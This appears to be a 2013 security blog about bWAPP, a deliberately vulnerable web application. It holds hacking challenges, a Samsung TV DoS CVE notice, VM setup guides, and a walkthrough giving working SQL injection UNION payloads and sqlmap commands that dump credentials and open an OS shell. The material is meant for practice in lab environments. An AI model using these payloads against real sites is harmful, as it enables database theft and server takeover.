Sunday, December 22, 2013

bWAPP - Xmas Hacking Challenge

Hi little bees, do you get bored in the Christmas Holidays? No panic, stay tuned with us... this time we are organizing a free bWAPP Xmas Hacking Challenge. Nothing to win, just for fun (and for educational purposes of course).

bWAPP, or a buggy web application, is a deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares you to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 60 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

Are you ready to get started with our Xmas Hacking Challenge? First of all, we need YOUR public IP address. E-mail us your public IP address at bWAPP [at] itsecgames.com. Once we receive your IP, we add you on our white-list and we e-mail you back all the details. Now you are ready to roll!

Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP


The first five tweeters who successfully accomplished a challenge are listed on our bWAPP Hack Hall of Fame.



[ CHALLENGE 1 ]

Bug to exploit: SQL Injection - Extracting Data


A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands (source: OWASP).



 
Your first mission is to grab and crack Santa's password using SQL injection.
A user 'Santa Claus' was added in the bWAPP database. We need the clear text password of that user...
Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP.

HINT: title='+or+1+union+select+1,2,3,4,5,6,7+--+


Hack Hall of Fame:

  1. Pen Duick, @_SaxX_
  2. Twan, @TwanSec
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 2 ]

Bug to exploit: SQL Injection - Website Defacement


Your second mission is to upload a file using SQL injection. Name the file [your_name]-sqli.htm and tweet a screenshot as proof to @MME_IT #bWAPP.

Good luck... this will probably be your first (legal) website defacement!

HINT: use an automated SQL injection tool like sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX_
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer






[ CHALLENGE 3 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Website Defacement


SSIs are directives present in web applications, used to feed an HTML page with dynamic content. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being rendered. In order to do so, the web server parses the SSI directives before supplying the page to the user.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be carried out by manipulating the SSI directives already in use in the application, or by forcing their use through user input fields.

It is possible to check if the application is properly validating input field data by inserting characters that are used in SSI directives, like: < ! # = / . " - > and [a-zA-Z0-9]

Another way to discover if the application is vulnerable is to verify the presence of pages with the extension .stm, .shtm or .shtml. However, the lack of these types of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access to, and manipulation of, the file system and processes under the permissions of the web server process owner.

The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected into input fields and sent to the web server. The web server parses and executes the directives before supplying the page. The result of the attack is then visible the next time the page is loaded in the user's browser (source: OWASP).
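The defensive side of the description above, as an added example that is not part of the original challenge text: a check that flags SSI directive syntax in user input (for logging or rejecting the request) and a renderer that HTML-escapes input so it can never form a directive in a server-parsed page. The directive names in the pattern are the standard Apache mod_include ones; the greeting page and sample inputs are constructed for this example.

```python
import html
import re
from typing import List

# Apache-style SSI directive: "<!--#" followed by a known directive name.
# Whitespace between the comment opener and the '#' is tolerated because
# some parsers accept it.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(exec|include|echo|config|set|printenv|fsize|flastmod"
    r"|if|elif|else|endif)\b",
    re.IGNORECASE,
)


def looks_like_ssi_injection(value: str) -> bool:
    """True when a request value contains something shaped like an SSI
    directive; useful as a detection signal in request logs or a WAF rule."""
    return SSI_DIRECTIVE.search(value) is not None


def flag_suspicious_values(values: List[str]) -> List[str]:
    """Returns the subset of submitted values that should be logged as
    possible SSI injection attempts."""
    return [v for v in values if looks_like_ssi_injection(v)]


def render_greeting_unsafe(name: str) -> str:
    """Vulnerable: the raw value is written into a page that the web server
    will parse for SSI directives (e.g. a .shtml page), so a directive in
    'name' is executed server-side."""
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name: str) -> str:
    """Hardened: HTML-escaping turns '<' into '&lt;', so the comment opener
    '<!--#' can never be assembled from user input."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    # Constructed sample inputs: one benign, one carrying a harmless directive.
    samples = ["Santa Claus", '<!--#echo var="DATE_LOCAL" -->']
    print("flagged:", flag_suspicious_values(samples))
    for s in samples:
        print(render_greeting_safe(s))
```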

Your third mission is to create a file using SSI injection. Name the file [your_name]-ssii.htm and tweet a screenshot as proof to @MME_IT #bWAPP. Another website defacement...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX
  3. philophobia, @philophobia78
  4. Yaser Faraj, @yaserfaraj
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 4 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Spawning a Shell


Your next mission is to spawn a command shell using SSI injection. Access the /etc/passwd file from the shell, and tweet a screenshot as proof to @MME_IT #bWAPP.

HINT: our firewall is blocking only incoming traffic...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. philophobia, @philophobia78
  3. Yaser Faraj, @yaserfaraj
  4. ...
  5. ...





Saturday, August 3, 2013

Samsung TV DoS vulnerability

Recently, I discovered a DoS vulnerability on some Samsung TV devices.

The web server (DMCRUIS/0.1) on port TCP/5600 crashes when it receives a long HTTP GET request, and as a result the TV reboots...

This was tested successfully on my Samsung PS50C7700 plasma TV.



CVE Number: CVE-2013-4890
Exploit Download Link: http://www.mmeit.be/exploits/samsungtv_reset.txt

In the demo, the TV is connected by Ethernet cable to a home network. After running the exploit against the TV's IP address, the TV restarts a few seconds later and the process repeats.

 
 
This means that a potential attacker only needs to obtain access to the LAN that the TV has joined, in order to attack it. This can be done either by breaking into a wireless access point or by infecting a computer on the same network with malware.

Feel free to make a root exploit and to hack your Samsung TV...

Now we need firewall and antivirus protection for our televisions too :)
Samsung did not immediately return a request for comment. A shame...

Other articles related to this vulnerability:


You can follow me on Twitter: @MME_IT

Tuesday, July 16, 2013

bee-box - Hacking & Defacing bWAPP

The bee-box is a custom Linux Ubuntu virtual machine (VM), pre-installed with bWAPP.

bee-box is compatible with VMware Player, Workstation, Fusion, and with Oracle VirtualBox. It requires zero installation!

bee-box gives you several ways to hack and deface the bWAPP website, currently there are 10 different website defacement possibilities! It's even possible to hack the bee-box, using a local privilege escalation exploit, to get full root access… Actually, with bee-box you have the opportunity to explore, and exploit, ‘all’ bWAPP vulnerabilities! Hacking, defacing and exploiting without going to jail... how cool is that?

You can download bee-box from here.



 

These are the requirements for installing bee-box:
  • Windows, Linux or Mac OS
  • VMware Player, Workstation or Fusion

An overview of the installation steps:
  • Extract the 'rar' file.
  • Double click on the VM configuration file (bee-box.vmx), or import the VM into the VMware software.
  • Start the VM. It will login automatically.
  • Check the IP address of the VM.
  • Go to the bWAPP login page. If you browse the bWAPP root directory you will be redirected. 
    example: http://[IP]/bWAPP/
    example: http://[IP]/bWAPP/login.php
  • Login with the default bWAPP credentials, or make a new user. 
    default credentials: bee/bug
  • You are ready to explore and exploit the bee!



Some additional notes:
  • Linux credentials:
    bee/bug - root/bug
  • MySQL credentials:
    root/bug
  • Modify the Postfix settings (relayhost,...) to your environment.
    config file: /etc/postfix/main.cf
  • Take a snapshot of the VM before hacking the bee-box.
    There is also a backup of the bWAPP website (/var/www/bWAPP_BAK).
  • To reinstall the bWAPP database, delete the database with phpmyadmin
    (http://[IP]/phpmyadmin/).
    Afterwards, browse to the following page: https://[IP]/bWAPP/install.php
  • Don't upgrade the Linux operating system, you will lose all fun :)
  • Check the SecurityTube (www.securitytube.net) for some amazing hacking videos.
    Thanks Vivek!

We also offer a 2-day comprehensive web security course 'Attacking & Defending Web Apps with bWAPP'.
This course can be scheduled on demand, at your location!




This project is part of the ITSEC Games project. ITSEC Games are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together.
You can find more about the ITSEC Games and bWAPP projects on our blog.

Enjoy!

Regards

Malik Mesellem
@MME_IT

Monday, January 21, 2013

bWAPP - SQL injection

Is bWAPP vulnerable to SQL injection? Yes of course. This is the purpose of bWAPP, our extremely buggy web application. It has some nice injection issues... I made them intentionally, remember?

No... I will not explain in detail what SQL injection is!
A SQL injection attack is probably the easiest attack to prevent, while being one of the least protected-against forms of attack. The core of the attack is that a SQL command is appended to the back end, usually through a form field in the website or web application, with the intent of breaking the original SQL statement and then running the SQL statement that was injected into the form field. I'm sure you can find enough tutorials on the Internet about SQL injection. Here's an example of a pretty nice article.

Yes... I will explain how to exploit bWAPP using SQL injection and how to take ownership of the database and even the underlying operating system. Definitely!



Currently there are 5 bugs in bWAPP related to SQL injection:
  • the Search page,
    where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
  • the Select page,
    where you can select a specific movie from a drop-down list.
  • the Login page,
    where you can enter your credentials to login.
  • the Blind SQL injection page,
    where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
  • and where is bug number 5?
    A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where. Please give us your feedback @MME_IT.



The Search page

Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string then all movies will be displayed.



The injection symptoms: when entering a single quote (') in the title field we receive the following message:

'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'

I love that message!

Here we go for some basic SQL injection fun:

blah' or 1=1--

results in all the records:



blah' or 1=2--

results in 0 records:



So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search


What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you want, let's go...

You could use the SQL UNION operator to append the results of a second query to the results of the original one.
First of all you need to ensure that your injected SELECT returns the same number of columns as the original SQL statement when using UNION!

blah' union select 1--

results in the following message:




After a while you will discover that you should use 6 columns:

 
blah' union select 1,1,1,1,1,1--

results in:



And that's great!
Now we can play with the field order and display the name of the current database:

blah' union select 1,DATABASE(),1,1,1,1-- 



We have found the name of the current database: bWAPP

Now our mission is to retrieve the table names of the current database:


blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--



We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the table users:

blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--



The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--



OK, we have the values! We exploited the underlying database by retrieving some confidential data. Apparently the password value is stored in a hashed state and cannot be retrieved directly. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p



Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will take over the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in Python.



We can automate the previous commands with sqlmap.

This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs




This dumps the selected columns of the users table, and it even cracks the password hashes automatically:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump



Using sqlmap we also have the possibility to create a shell with the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell



Conclusion

SQL injection can have disastrous consequences, no doubt about it.

Feel free to test for SQL injection vulnerabilities using the bWAPP web application. As you know there are 5 different bugs related to SQL injection. You can download bWAPP from here. Don't forget to set the security level to low or medium. With security level high you will notice that SQL injection is no longer possible, because at that level every user input is validated. This is done with the MySQL real escape string function and with prepared statements.
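To show why the low-level Search page falls to the payloads used earlier in this post and why the high-level version does not, here is an added example (not bWAPP's own PHP code) that mirrors the search query against a constructed in-memory SQLite table of the same six-column shape: the vulnerable form splices the title into the SQL text, the hardened form binds it as a parameter, and a helper returns the database error that a single quote provokes, which is the "injection symptom" described above.

```python
import sqlite3
from typing import List, Optional, Tuple

# Constructed sample rows standing in for the bWAPP 'movies' table; only the
# six-column shape that the UNION payloads on this page depend on is mirrored.
MOVIES: List[Tuple] = [
    (1, "Sample Movie A", 2001, "action", "Hero A", "tt0000001"),
    (2, "Sample Movie B", 2005, "drama", "Hero B", "tt0000002"),
    (3, "Sample Movie C", 2012, "comedy", "Hero C", "tt0000003"),
]


def make_sample_db() -> sqlite3.Connection:
    """In-memory database populated with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER, "
        "genre TEXT, main_character TEXT, imdb TEXT)"
    )
    conn.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?)", MOVIES)
    return conn


def search_movies_vulnerable(conn: sqlite3.Connection, title: str) -> List[Tuple]:
    """Security level low: the search string becomes part of the SQL text.
    A quote in "blah' or 1=1-- " closes the LIKE pattern early, the injected
    condition joins the WHERE clause, and '--' comments out the trailing %'."""
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return conn.execute(sql).fetchall()


def search_movies_safe(conn: sqlite3.Connection, title: str) -> List[Tuple]:
    """Security level high, prepared-statement style: the search string is
    bound as a parameter, so the engine treats it purely as a value and the
    same payloads simply match no title."""
    sql = "SELECT * FROM movies WHERE title LIKE ?"
    return conn.execute(sql, ("%" + title + "%",)).fetchall()


def db_error_for(conn: sqlite3.Connection, title: str) -> Optional[str]:
    """Returns the database error text the vulnerable search raises for the
    given input (None if the query runs). Echoing such text to the browser,
    as the page's MySQL error does, is what confirms the bug to a tester."""
    try:
        search_movies_vulnerable(conn, title)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_sample_db()
    print("single quote ->", db_error_for(db, "'"))
    print("vulnerable, or 1=1 ->", len(search_movies_vulnerable(db, "blah' or 1=1-- ")), "rows")
    print("safe, or 1=1 ->", len(search_movies_safe(db, "blah' or 1=1-- ")), "rows")
```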

If you want to know more about SQL injection and tools like sqlmap, don't hesitate to subscribe for our ITSEC training. Or just invite me to your security event. It would be an honor for me to speak at your event!

Regards

Malik

Sunday, January 20, 2013

bWAPP - Samurai WTF

In one of the previous articles I described the necessary steps to install bWAPP, or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on the Samurai Web Testing Framework.

The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web penetration testing environment. The image contains the best of the open source and free tools that focus on testing and attacking websites.

 


Once you have booted Samurai WTF you can copy the bWAPP tar file to the desktop.
Extract it from here. A new directory 'bWAPP' will be created.
Syntax
cd /home/samurai/Desktop/
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /home/samurai/Desktop/bWAPP /var/www

Edit the file 'admin/settings.php'. Use the Samurai MySQL settings.
You need to change the password to 'samurai'. Yes... the password of the MySQL root user on Samurai is actually 'samurai'.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT

Monday, January 14, 2013

bWAPP - Metasploitable

In the previous article I described the necessary steps to install bWAPP, or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on Metasploitable.

Metasploitable is an intentionally vulnerable Linux virtual machine. The VM can also be used to provide security training, test security tools, and practice common penetration testing techniques. It runs on any recent VMware product and other virtualization technologies such as VirtualBox, VMFusion, Hyper-V,... Thank you HD Moore and Rapid7!



You can download the image file of Metasploitable 2 from here. The default login and password is msfadmin/msfadmin.

Once you have booted the Metasploitable VM you can copy the tar file to the temp directory. Extract it from here. A new directory 'bWAPP' will be created. 
Syntax
cd /tmp
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /tmp/bWAPP /var/www

Go to the bWAPP directory and give full permission to the directories 'passwords' and 'images'. This step is optional but it will give you so much fun when exploiting bWAPP with tools like sqlmap and Metasploit!
Syntax

chmod 777 images/
chmod 777 passwords/


Edit the file 'admin/settings.php'. Use the Metasploitable MySQL settings.
Yeah you're right, there's nothing to change. The MySQL root user on Metasploitable has a blank password.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT